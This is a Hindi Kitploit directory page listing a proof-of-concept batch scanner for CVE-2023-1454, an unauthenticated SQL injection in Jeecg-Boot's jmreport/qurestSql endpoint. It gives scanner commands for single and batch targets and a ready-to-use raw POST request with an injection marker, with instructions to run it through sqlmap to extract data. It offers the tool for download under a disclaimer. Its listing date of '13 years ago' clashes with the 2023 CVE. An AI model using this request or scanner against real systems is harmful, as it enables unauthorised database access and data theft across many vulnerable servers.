Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-1454 — jmreport/qurestSql अनधिकृत SQL इंजेक्शन बैच स्कैन POC | Kitploit
उपकरण/GitHubGitHub/cjybao/cve-2023-1454
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubcjybao/cve-2023-1454

CVE-2023-1454

jmreport/qurestSql अनधिकृत SQL इंजेक्शन बैच स्कैन POC

रिपॉजिटरी देखें
13 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-1454

jmreport/qurestSql अनधिकृत SQL इंजेक्शन बैच स्कैन POC Jeecg-Boot स्प्रिंग बूट और Jeecg-Boot-Plus पर आधारित एक तीव्र विकास मंच है। नवीनतम jeecg-boot 3.5.0 में कई SQL इंजेक्शन कमजोरियाँ पाई गई हैं।

टूल का उपयोग

python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 एकल URL परीक्षण

python3 CVE-2023-1454-scan.py -f url.txt बैच जांच

स्कैन समाप्त होने के बाद वर्तमान निर्देशिका में कमजोर URL वाली vuln.txt फ़ाइल उत्पन्न होगी।

poc:

exp:

डेटा पैकेट को txt के रूप में सहेजें और sqlmap का उपयोग करके डेटा प्राप्त किया जा सकता है:

root@kitploit:~
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129

{"apiSelectId":"1290104038414721025",
"id":"1*"}

अस्वीकरण

इस दस्तावेज़ में दी गई जानकारी के प्रसार या उपयोग से उत्पन्न किसी भी प्रत्यक्ष या अप्रत्यक्ष परिणाम और हानि के लिए केवल उपयोगकर्ता स्वयं जिम्मेदार होगा; लेखक कोई जिम्मेदारी नहीं लेता है।

टूल डाउनलोड करें